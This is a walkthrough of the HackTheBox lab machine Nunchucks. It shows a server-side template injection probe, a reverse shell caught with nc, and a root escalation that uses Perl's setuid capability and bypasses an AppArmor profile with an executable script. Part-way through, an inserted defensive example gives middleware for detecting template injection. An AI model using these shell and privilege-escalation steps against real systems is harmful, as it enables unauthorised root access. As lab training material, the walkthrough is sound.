Nunchucks from HackTheBox — Detailed Walkthrough
Showing you all the tools and techniques needed to complete the box.
Machine Information
Nunchucks is an easy machine on HackTheBox. We start with enumeration and find a website on a subdomain that’s vulnerable to server-side template injection. More exploration finds a vulnerable template engine that we exploit to get a reverse shell. Escalation to root is via a capability set on the perl binary. Using a GTFOBins example we exploit this to get a root shell.
Skills required are basic scanning and enumeration techniques. Skills learned are finding and using publicly available exploits.
Initial Recon
As always let’s start with Nmap:
We see three open ports, with 443 revealing a hostname, let’s add that to /etc/hosts:
┌──(root💀kali)-[~/nunchucks]
└─# echo "10.10.11.122 nunchucks.htb" >> /etc/hosts
Website
From Nmap above we see HTTP on port 80 redirects to HTTPS on port 443. Visiting the site we see it’s an online shop creation platform:
Gobuster
Looking around it’s just a basic template of a site. There’s a form to sign up for an account, but if you try then it says registrations are closed for now. Under the Links section at the bottom it mentions there is a store coming soon. We also know from past CTFs that there are often vhosts, so let’s try scanning:
We find the store! Add to hosts file first:
┌──(root💀kali)-[~]
└─# sed -i '/10.10.11.122 nunchucks.htb/ s/$/ store.nunchucks.htb/' /etc/hosts
Nunchucks Store
Now let’s have a look:
After some playing around we find this form is vulnerable to server side template injection (SSTI):
SSTI
Like we saw on Bolt we can use examples from HackTricks to confirm. Above we see the response of 49 confirms the payload of 7 * 7 was evaluated on the server side and the answer returned to the page.
Now we know it’s vulnerable we need a way to exploit it. Looking at Wappalyzer it detects the web framework used as Express:
Following the Wappalyzer link here there’s more information about the framework and a link that takes us to the ExpressJS website. Looking around there we find something interesting under the resources section:
There’s a template engine called Nunjucks, which is very suspicious as that is almost the same name as this box. Following that we end up at a Github repo here. A search for “nunjucks ssti” finds this and then to this. This last article explains a sandbox break out which can easily be followed by using the described payload:
We just need to escape the single and double quotes by putting a backslash in front of them, then use curl to deliver:
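From the defender’s side, the lesson of this section is that the store’s /api/submit endpoint fed the submitted email straight into the template engine. The block below is an added example, not code from the box or the write-up: an Express-style middleware (assumed hypothetical names `findTemplateSyntax` and `sstiGuard`) that flags Nunjucks/Jinja-style template delimiters in any string of a parsed JSON body, logs the probe and returns 400. This is a detection layer only; the actual fix is to render a fixed template and pass user input as context, never as the template string.

```javascript
// Added example (not from the write-up): detect SSTI probes such as {{7*7}} in a JSON body.
// Opening delimiters only (fewer false positives than matching "}}"), plus URL-encoded forms:
// "{{" = %7B%7B and "{%" = %7B%25.
const TEMPLATE_SYNTAX = /(\{\{|\{%|%7B%7B|%7B%25)/i;

// Walk a parsed JSON value and return the dotted paths of strings containing template syntax.
function findTemplateSyntax(value, path = '', hits = []) {
  if (typeof value === 'string') {
    if (TEMPLATE_SYNTAX.test(value)) hits.push({ path: path || '$', value });
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findTemplateSyntax(v, `${path}[${i}]`, hits));
  } else if (value && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) {
      findTemplateSyntax(v, path ? `${path}.${k}` : k, hits);
    }
  }
  return hits;
}

// Express-style middleware: reject the request and emit a structured log line for the SOC.
// The offending value is deliberately not echoed back to the client.
function sstiGuard(req, res, next) {
  const hits = findTemplateSyntax(req.body); // req.body is undefined without a body parser; that is safe here
  if (hits.length === 0) return next();
  console.warn(JSON.stringify({
    event: 'ssti_probe',
    ip: req.ip,
    path: req.path,
    fields: hits.map((h) => h.path),
    ts: new Date().toISOString(),
  }));
  return res.status(400).json({ error: 'invalid input' });
}

// Constructed sample, shaped like the JSON POST the write-up sends to /api/submit.
const sample = { email: '{{7*7}}@example.com', name: 'david' };
console.log(findTemplateSyntax(sample)); // [{ path: 'email', value: '{{7*7}}@example.com' }]
```

Safe rendering, for contrast, is `nunjucks.renderString('Thanks, {{ email }}', { email })`: the template is a constant and the user value is only data.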
Reverse Shell
I’ve used sed to tidy up the output and make it more readable. With that working let’s try for a reverse shell:
┌──(root💀kali)-[~/htb/nunchucks]
└─# curl -s -k -X POST -H $'Content-Type: application/json' --data-binary $'{\"email\":\"\"\x0d\x0a}' 'https://store.nunchucks.htb/api/submit'
Switch to a waiting nc listener to see our connection:
┌──(root💀kali)-[~/htb/nunchucks]
└─# nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.122] 60976
First let’s upgrade the shell to something more useable:
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
david@nunchucks:/var/www/store.nunchucks$ ^Z
zsh: suspended nc -nlvp 1337
┌──(root💀kali)-[~/htb/nunchucks]
└─# stty raw -echo; fg
[1] + continued nc -nlvp 1337
david@nunchucks:/var/www/store.nunchucks$
User Flag
With that sorted let’s get the user flag:
david@nunchucks:/var/www/store.nunchucks$ cat /home/david/user.txt
<HIDDEN>
After some enumeration I found a Perl script in /opt:
david@nunchucks:/var/www/store.nunchucks$ ls -lsa /opt
4 -rwxr-xr-x 1 root root 838 Sep 1 12:53 backup.pl
4 drwxr-xr-x 2 root root 4096 Oct 28 17:03 web_backups
Setuid Exploit
Looking at the script the first section has setuid(0):
david@nunchucks:/var/www/store.nunchucks$ cat /opt/backup.pl
#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid);
POSIX::setuid(0);
The rest of the script is taking the contents of /var/www and backing it up to /tmp then moving it to /opt. The interesting part is that setuid command at the start. On a previous TryHackMe box called Wonderland I used this same capability. The GTFOBins article here explains how we can exploit this:
If the binary has the Linux CAP_SETUID capability set or it is executed by another
binary with the capability set, it can be used as a backdoor to maintain privileged
access by manipulating its own process UID.
If we check the perl binary we see it has CAP_SETUID set:
david@nunchucks:/var/www/store.nunchucks$ getcap /usr/bin/perl
/usr/bin/perl = cap_setuid+ep
Using the provided exploit from GTFOBins does nothing:
david@nunchucks:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
david@nunchucks:/tmp$
Why is this? Well, it turns out the box has AppArmor enabled for Perl. Useful info here from Ubuntu on its usage. If we look in /etc/apparmor.d as described in the article we see there is a profile for Perl:
david@nunchucks:/tmp$ ls -lsa /etc/apparmor.d/usr.bin.*
-rw-r--r-- 1 root root 202 Feb 25 2020 /etc/apparmor.d/usr.bin.man
-rw-r--r-- 1 root root 442 Sep 26 01:16 /etc/apparmor.d/usr.bin.perl
Looking at the file we can see it’s blocking us, but we can bypass this by using a .pl file with the Perl shebang in it and made executable. A little info here but it’s simple enough.
Root Flag
Echo the same commands from GTFOBins to a file on the box:
david@nunchucks:/tmp$ echo '#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/sh";' > pencer.pl
Now make it executable then call it direct:
david@nunchucks:/tmp$ chmod +x pencer.pl
david@nunchucks:/tmp$ ./pencer.pl
# id
uid=0(root) gid=1000(david) groups=1000(david)
# cat /root/root.txt
<HIDDEN>
And there we go. Another box rooted, see you next time.
Twitter — https://twitter.com/pencer_io
Website — https://pencer.io
Originally published at https://pencer.io on May 19, 2022.